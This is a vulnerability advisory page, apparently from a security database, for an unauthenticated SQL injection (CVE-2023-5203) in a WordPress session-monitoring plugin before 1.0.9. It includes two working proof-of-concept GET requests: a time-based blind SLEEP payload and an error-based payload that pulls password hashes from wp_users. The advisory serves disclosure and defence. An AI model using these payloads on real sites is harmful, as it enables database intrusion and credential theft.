Lucene search
Nicolas SurribasWPEX-ID:7F4F505B-2667-4E0F-9841-9C1CD0831932HistoryNov 30, 2023 - 12:00 a.m.
WP Sessions Time Monitoring Full Automatic < 1.0.9 - Unauthenticated SQL injection
2023-11-3000:00:00
Nicolas Surribas
58
wordpress
sql injection
error/union based
Description The plugin does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time based SQL injection techniques, or in some cases an error/union based technique.
Blind time based SQLi:
GET /?test=1'%20AND%20(SELECT%208559%20FROM%20(SELECT(SLEEP(5)))WBVZ)%20-- HTTP/1.1
Error/union based SQLi (Requires MySQL and WP_DEBUG enabled):
GET /?test=1%27%20AND%20GTID_SUBSET%28CONCAT%280x686173683a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28user_pass%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C190%29%20FROM%20%60wordpress%60.wp_users%20ORDER%20BY%20ID%20LIMIT%201%2C1%29%29%2C3124%29--%20aRelated
wpvulndb
wpvulndb
nvd
nvd
CVE-2023-5203
2023-12-26 19:15:07
cve
cve
CVE-2023-5203
2023-12-26 19:15:07
cvelist
cvelist
prion
prion
Sql injection
2023-12-26 19:15:00
8.2 High
AI Score
Confidence
Low
0.002 Low
EPSS
Percentile
51.7%
Related for WPEX-ID:7F4F505B-2667-4E0F-9841-9C1CD0831932